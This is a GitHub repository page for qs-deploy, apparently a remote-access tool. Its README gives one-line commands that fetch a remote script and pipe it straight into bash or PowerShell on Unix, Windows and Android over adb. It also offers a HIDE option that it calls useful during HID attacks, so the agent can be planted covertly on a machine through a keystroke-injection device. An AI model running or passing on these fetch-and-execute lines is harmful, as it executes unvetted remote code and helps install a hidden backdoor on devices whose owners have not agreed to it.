Skip to content

qsocket/qs-deploy

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

qs-deploy


For Unix-like systems (almost any OS with a bash)

curl -fsSL qsocket.io/0 | bash"

For Windows

irm qsocket.io/1 | iex

For Android (no-root devices)

  1. Enable USB debugging on the android devive.
  2. Attach the android device to a linux host with adb installed.
  3. Run the following command on the linux host...
curl -fsSL qsocket.io/2 | bash"

Deploy Examples

Deploy with a spesific secret value

S="MySecret" curl -fsSL qsocket.io/0 | bash # For *nix
$env:S="MySecret"; irm qsocket.io/1 | iex  # For Windows

Hide Terminal During Deploymeny

This option can be usefull during HID attacks.

HIDE=1 curl -fsSL qsocket.io/0 | bash # For \*nix
$env:HIDE=1; irm qsocket.io/1 | iex # For Windows

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published